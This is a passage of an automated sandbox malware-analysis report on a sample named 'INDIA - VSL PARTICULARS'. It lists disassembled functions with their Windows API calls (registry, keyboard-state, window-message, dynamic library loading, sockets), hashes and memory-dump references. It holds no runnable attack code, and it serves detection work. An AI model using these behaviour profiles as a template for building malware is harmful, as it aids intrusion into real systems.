                              • Opcode ID: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                              • Instruction ID: 469fbb3f3db71b9324cb07d082b932f31bc4dcc79b85a5821822f518eef070f3
                              • Opcode Fuzzy Hash: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                              • Instruction Fuzzy Hash: 0BB19F71600619EFEB14CF68C984BAFBBF1FF48301F15851AEA5597280D738BA61CB54
                              Function 0046B6AB Relevance: 10.8, APIs: 7, Instructions: 258registryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B799
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: ConnectRegistry_memmove_wcslen
                              • String ID:
                              • API String ID: 15295421-0
                              • Opcode ID: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
                              • Instruction ID: 8aea567fc0405534ed4901798b67d501f7e0ea7b8d3e81485b6dc33093e60a2a
                              • Opcode Fuzzy Hash: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
                              • Instruction Fuzzy Hash: 96A170B12043019FD710EF65CC85B1BB7E8EF85304F14892EF6859B291DB78E945CB9A
                              Function 00467511 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 213COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                              • _wcstok.LIBCMT ref: 004675B2
                                • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                              • _wcscpy.LIBCMT ref: 00467641
                              • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                              • _wcslen.LIBCMT ref: 00467793
                              • _wcslen.LIBCMT ref: 004677BD
                                • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                              • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: _wcslen$FileName_memmove$OpenSave__getptd_wcscpy_wcstok
                              • String ID: X
                              • API String ID: 780548581-3081909835
                              • Opcode ID: 59d8333ba564867e966a45eb1cae5b5c9aa55f5f2a82546ce07c615cef46a44c
                              • Instruction ID: 4d78316a312392ccd7929e5b9cc6f9f998d70627324fd0ae594e8e4bf7546d1d
                              • Opcode Fuzzy Hash: 59d8333ba564867e966a45eb1cae5b5c9aa55f5f2a82546ce07c615cef46a44c
                              • Instruction Fuzzy Hash: 1381A3315083008FD310EF65C985A5FB7E5AF84318F108A2FF599572A1EB78ED46CB9A
                              Function 0044734F Relevance: 10.7, APIs: 7, Instructions: 210COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                              • Ellipse.GDI32(?,?,FFFFFFFE,00000000,00000000), ref: 004474C4
                              • MoveToEx.GDI32(?,?,FFFFFFFE,00000000), ref: 004474D4
                              • AngleArc.GDI32(?,?,FFFFFFFE,00000000), ref: 0044750F
                              • LineTo.GDI32(?,?,FFFFFFFE), ref: 00447518
                              • CloseFigure.GDI32(?), ref: 0044751F
                              • SetPixel.GDI32(?,?,FFFFFFFE,00000000), ref: 0044752E
                              • Rectangle.GDI32(?,?,FFFFFFFE,00000000), ref: 0044754A
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
                              • String ID:
                              • API String ID: 4082120231-0
                              • Opcode ID: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                              • Instruction ID: e674395c2b36b0b5590bf657e4107f8d2570055e184bc57fe517c57e0a53fcaf
                              • Opcode Fuzzy Hash: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                              • Instruction Fuzzy Hash: 36713CB4904109EFEB04CF94C884EBEBBB9EF85310F24855AE9156B341D774AE42CBA5
                              Function 0046B280 Relevance: 10.7, APIs: 7, Instructions: 196registryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B3A6
                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?), ref: 0046B3D2
                              • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 0046B3FD
                              • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0046B430
                              • RegCloseKey.ADVAPI32(?,000000FF,00000000), ref: 0046B459
                              • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0046B492
                              • RegCloseKey.ADVAPI32(?), ref: 0046B49D
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Close$ConnectEnumOpenRegistryValue_malloc_memmove_wcslen
                              • String ID:
                              • API String ID: 2027346449-0
                              • Opcode ID: f0ceecdc90b01f2c9ddf0369269a16fa16a69f0e3d9f986347dd5438d1ccccc0
                              • Instruction ID: e744fe3a0f0af3658e2b80b3541497a384b181c150b1b14c88f03688e4e42502
                              • Opcode Fuzzy Hash: f0ceecdc90b01f2c9ddf0369269a16fa16a69f0e3d9f986347dd5438d1ccccc0
                              • Instruction Fuzzy Hash: 92613D71218301ABD304EF65C985E6BB7A8FFC8704F008A2EF945D7281DB75E945CBA6
                              Function 0047A66E Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                              • GetMenu.USER32 ref: 0047A703
                              • GetMenuItemCount.USER32(00000000), ref: 0047A74F
                              • GetMenuStringW.USER32(00000000,?,?,00007FFF,00000400), ref: 0047A783
                              • _wcslen.LIBCMT ref: 0047A79E
                              • GetMenuItemID.USER32(00000000,?), ref: 0047A7E0
                              • GetSubMenu.USER32(00000000,?), ref: 0047A7F2
                              • PostMessageW.USER32(?,00000111,?,00000000), ref: 0047A884
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Menu$Item$CountMessagePostStringWindow_malloc_wcslen
                              • String ID:
                              • API String ID: 3257027151-0
                              • Opcode ID: 80d25b5d47cdb8856cfd5c6f23c0a19e515c97fff049208cbae9d6eea43d64d6
                              • Instruction ID: 02f8ada5611b6a2978ded3aa89f74167ce8c021908d800e5e23178b580333db3
                              • Opcode Fuzzy Hash: 80d25b5d47cdb8856cfd5c6f23c0a19e515c97fff049208cbae9d6eea43d64d6
                              • Instruction Fuzzy Hash: AA51FA71504301ABD310EF25DC81B9FB7E8FF88314F108A2EF989A7241D779E95487A6
                              Function 0046D230 Relevance: 10.7, APIs: 7, Instructions: 170networkCOMMON
                              Download Yara Rule
                              APIs
                              • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 0046D3D3
                              • WSAGetLastError.WSOCK32(00000000), ref: 0046D3E4
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: ErrorLastselect
                              • String ID:
                              • API String ID: 215497628-0
                              • Opcode ID: 7869ea255bd8c826c1db511583610b45135028457a69a3d51942e2ff55a69274
                              • Instruction ID: fadcceb5308e48970113ceaff65c18732520a09434288b0a98514d96d8681c7b
                              • Opcode Fuzzy Hash: 7869ea255bd8c826c1db511583610b45135028457a69a3d51942e2ff55a69274
                              • Instruction Fuzzy Hash: 65510772E001046BD710EF69DC85FAEB3A8EB94320F14856EF905D7381EA35DD41C7A5
                              Function 004443FC Relevance: 10.7, APIs: 7, Instructions: 170windowCOMMON
                              Download Yara Rule
                              APIs
                              • GetParent.USER32(?), ref: 0044443B
                              • GetKeyboardState.USER32(?), ref: 00444450
                              • SetKeyboardState.USER32(?), ref: 004444A4
                              • PostMessageW.USER32(?,00000101,00000010,?), ref: 004444D4
                              • PostMessageW.USER32(?,00000101,00000011,?), ref: 004444F5
                              • PostMessageW.USER32(?,00000101,00000012,?), ref: 00444541
                              • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00444566
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: MessagePost$KeyboardState$Parent
                              • String ID:
                              • API String ID: 87235514-0
                              • Opcode ID: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                              • Instruction ID: 8f44bbd55e3387c5fecf3766ecc31f273ddc6601011f0052083f6d8a5cbafb33
                              • Opcode Fuzzy Hash: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                              • Instruction Fuzzy Hash: 2051D6A05047D53AFB3682748846BA7BFE42F86704F08868BE1D5559C3D3ECE994CB68
                              Function 004445F4 Relevance: 10.7, APIs: 7, Instructions: 170windowCOMMON
                              Download Yara Rule
                              APIs
                              • GetParent.USER32(?), ref: 00444633
                              • GetKeyboardState.USER32(?), ref: 00444648
                              • SetKeyboardState.USER32(?), ref: 0044469C
                              • PostMessageW.USER32(?,00000100,00000010,?), ref: 004446C9
                              • PostMessageW.USER32(?,00000100,00000011,?), ref: 004446E7
                              • PostMessageW.USER32(?,00000100,00000012,?), ref: 00444730
                              • PostMessageW.USER32(?,00000100,0000005B,?), ref: 00444752
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: MessagePost$KeyboardState$Parent
                              • String ID:
                              • API String ID: 87235514-0
                              • Opcode ID: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                              • Instruction ID: 3b822c4357a53f38689f34ecdfb8cd013e642acfd09065eaf4f6fa9230d15588
                              • Opcode Fuzzy Hash: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                              • Instruction Fuzzy Hash: 7451D4B05047D139F73692688C45BA7BFD86B8B304F08868FF1D5156C2D3ACB895CB69
                              Function 0045537F Relevance: 10.6, APIs: 7, Instructions: 149windowCOMMON
                              Download Yara Rule
                              APIs
                              • SendMessageW.USER32(?,00001308,?,00000000), ref: 0045539F
                              • ImageList_Remove.COMCTL32(?,?), ref: 004553D3
                              • SendMessageW.USER32(?,0000133D,?,00000002), ref: 004554BB
                              • DeleteObject.GDI32(?), ref: 00455736
                              • DeleteObject.GDI32(?), ref: 00455744
                              • DestroyIcon.USER32(?), ref: 00455752
                              • DestroyWindow.USER32(?), ref: 00455760
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: DeleteDestroyMessageObjectSend$IconImageList_RemoveWindow
                              • String ID:
                              • API String ID: 2354583917-0
                              • Opcode ID: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
                              • Instruction ID: c6eb43681ca9132c11a6020d2ba108f27148fdc9c8ef1f50c91adec3b3f4716e
                              • Opcode Fuzzy Hash: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
                              • Instruction Fuzzy Hash: 76516B74204A419FC714DF24C4A4BB677F5FF8A302F1486AAED998B392D738A849CB54
                              Function 00464812 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 145libraryloaderCOMMON
                              Download Yara Rule
                              APIs
                              • LoadLibraryW.KERNEL32(00000000,?,?,?), ref: 0046485D
                              • GetProcAddress.KERNEL32(?,?), ref: 004648F7
                              • GetProcAddress.KERNEL32(?,00000000), ref: 00464916
                              • GetProcAddress.KERNEL32(?,?), ref: 0046495A
                              • FreeLibrary.KERNEL32(?,?,?,?), ref: 0046497C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: AddressProc$Library$FreeLoad
                              • String ID: #v
                              • API String ID: 2449869053-554117064
                              • Opcode ID: 178b694003ef1c8c6ddf6c03964e3c93f4f33891ff2eeadba8088ba5e41252f8
                              • Instruction ID: 8919579e2c9fc9b2d94c4928dd3202a5bdd7863bc063e44bf2a6fba2f1eed130
                              • Opcode Fuzzy Hash: 178b694003ef1c8c6ddf6c03964e3c93f4f33891ff2eeadba8088ba5e41252f8
                              • Instruction Fuzzy Hash: 2351BF756002049FCB00EFA4C985A9EB7B4EF88304F14856EFD05AB392DB79ED45CB99
                              Function 0044982A Relevance: 10.6, APIs: 7, Instructions: 135COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                              • Instruction ID: 5d193f65ffce5f3a1406795a0d9a37a93f2f4887bdc9b14e5c8c629f49d9966a
                              • Opcode Fuzzy Hash: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                              • Instruction Fuzzy Hash: 0A413871900114ABE710DF58CC84FAF7765EB46320F14826EF858AB3C1C7745D02EB98
                              Function 0044882A Relevance: 10.6, APIs: 7, Instructions: 130windowCOMMON
                              Download Yara Rule
                              APIs
                              • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004488BD
                              • SendMessageW.USER32(?,00000469,?,00000000), ref: 004488D3
                              • EnableWindow.USER32(?,00000000), ref: 00448B5C
                              • EnableWindow.USER32(?,00000001), ref: 00448B72
                              • ShowWindow.USER32(?,00000000), ref: 00448BE8
                              • ShowWindow.USER32(?,00000004), ref: 00448BF4
                              • EnableWindow.USER32(?,00000001), ref: 00448C09
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Window$Enable$Show$MessageMoveSend
                              • String ID:
                              • API String ID: 896007046-0
                              • Opcode ID: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
                              • Instruction ID: 578be1c3660e2fd518c7beccd973f741d6ce186f3db94e5441c29ef1e5fc56da
                              • Opcode Fuzzy Hash: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
                              • Instruction Fuzzy Hash: 5F419D742003809FF724DB24C894BAB77E0FF96305F18446EF5859B291DB78A845CB59
                              Function 00448AB2 Relevance: 10.6, APIs: 7, Instructions: 98windowCOMMON
                              Download Yara Rule
                              APIs
                              • SendMessageW.USER32(?,00000401,?,00000000), ref: 00448AC9
                              • GetFocus.USER32 ref: 00448ACF
                              • EnableWindow.USER32(?,00000000), ref: 00448B5C
                              • EnableWindow.USER32(?,00000001), ref: 00448B72
                              • ShowWindow.USER32(?,00000000), ref: 00448BE8
                              • ShowWindow.USER32(?,00000004), ref: 00448BF4
                              • EnableWindow.USER32(?,00000001), ref: 00448C09
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Window$Enable$Show$FocusMessageSend
                              • String ID:
                              • API String ID: 3429747543-0
                              • Opcode ID: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
                              • Instruction ID: 6f3afe48a64986b2df7f4b22be5166ca64fe0b5af1f2aee4406df3dc20f3ce1d
                              • Opcode Fuzzy Hash: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
                              • Instruction Fuzzy Hash: F331C4706043805BF7248F24CCC8BAFB7D4FB95305F08491EF581A6291DBBCA845CB59
                              Function 0045D448 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 83COMMON
                              Download Yara Rule
                              APIs
                              • SetErrorMode.KERNEL32(00000001), ref: 0045D459
                              • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D4CF
                              • __swprintf.LIBCMT ref: 0045D4E9
                              • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D52D
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
